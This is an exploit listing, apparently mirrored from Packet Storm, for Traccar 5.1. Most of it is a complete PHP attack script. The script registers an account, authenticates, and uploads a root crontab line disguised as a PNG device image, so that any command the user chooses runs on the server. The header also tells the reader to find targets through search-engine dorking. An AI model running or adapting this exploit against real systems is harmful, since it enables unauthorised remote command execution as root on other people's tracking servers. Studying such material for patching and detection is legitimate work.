Share
## https://sploitus.com/exploit?id=PACKETSTORM:181804
=============================================================================================================================================  
| # Title : Traccar 5.1 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.traccar.org/old-versions/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This PHP script assumes you're targeting a similar HTTP service that allows file uploads and interacting with REST APIs.  
  
[+] save payload as poc.php  
  
[+] usage : C:\www\test>php poc.php  
  
[+] Line 117 : login info : 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');  
  
[+] payload :  
  
<?php  
  
class TraccarExploit {  
  
private $host;  
private $port;  
private $username;  
private $password;  
private $email;  
private $target_uri;  
  
public function __construct($host, $port = 8082, $username = '', $password = '', $email = '', $target_uri = '/') {  
$this->host = $host;  
$this->port = $port;  
$this->username = $username;  
$this->password = $password;  
$this->email = $email;  
$this->target_uri = $target_uri;  
}  
  
public function send_request($method, $uri, $data = null, $ctype = 'application/json') {  
$url = "http://{$this->host}:{$this->port}{$uri}";  
  
$headers = [  
"Content-Type: {$ctype}",  
];  
  
$ch = curl_init($url);  
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
if ($data) {  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
}  
  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
return json_decode($response, true);  
}  
  
public function register_user() {  
echo "Registering new user...\n";  
  
$body = json_encode([  
'name' => $this->username,  
'email' => $this->email,  
'password' => $this->password,  
'totpKey' => null  
]);  
  
$res = $this->send_request('POST', $this->target_uri . 'api/users', $body);  
  
if (!$res || $res['code'] !== 200) {  
die("Failed to register user. Response: " . print_r($res, true));  
}  
  
echo "User registered successfully.\n";  
}  
  
public function authenticate() {  
echo "Authenticating...\n";  
  
$data = http_build_query([  
'email' => $this->email,  
'password' => $this->password  
]);  
  
$res = $this->send_request('POST', $this->target_uri . 'api/session', $data, 'application/x-www-form-urlencoded');  
  
if (!$res || $res['code'] !== 200) {  
die("Failed to authenticate. Response: " . print_r($res, true));  
}  
  
echo "Authenticated successfully.\n";  
}  
  
public function upload_cron_file($cmd) {  
echo "Adding new device...\n";  
  
$body = json_encode([  
'name' => bin2hex(random_bytes(8)),  
'uniqueId' => bin2hex(random_bytes(8))  
]);  
  
$res = $this->send_request('POST', $this->target_uri . 'api/devices', $body);  
  
if (!$res || $res['code'] !== 200) {  
die("Failed to add device. Response: " . print_r($res, true));  
}  
  
$device_id = $res['id'];  
$cron_job = "* * * * * root /bin/bash -c '{$cmd}'\n";  
$cron_filename = bin2hex(random_bytes(6));  
  
echo "Uploading crontab file...\n";  
  
$file_data = [  
'file' => curl_file_create("data://text/plain;base64," . base64_encode($cron_job), 'image/png', "{$cron_filename}.png")  
];  
  
$this->send_request('POST', $this->target_uri . "api/devices/{$device_id}/image", $file_data, 'multipart/form-data');  
  
echo "Cronjob file uploaded successfully. Waiting for execution...\n";  
}  
  
public function exploit($cmd) {  
$this->register_user();  
$this->authenticate();  
$this->upload_cron_file($cmd);  
}  
}  
  
// Usage example:  
$exploit = new TraccarExploit('127.0.0.1', 8082, 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');  
$exploit->exploit('id'); // Replace 'id' with your desired command to execute  
  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================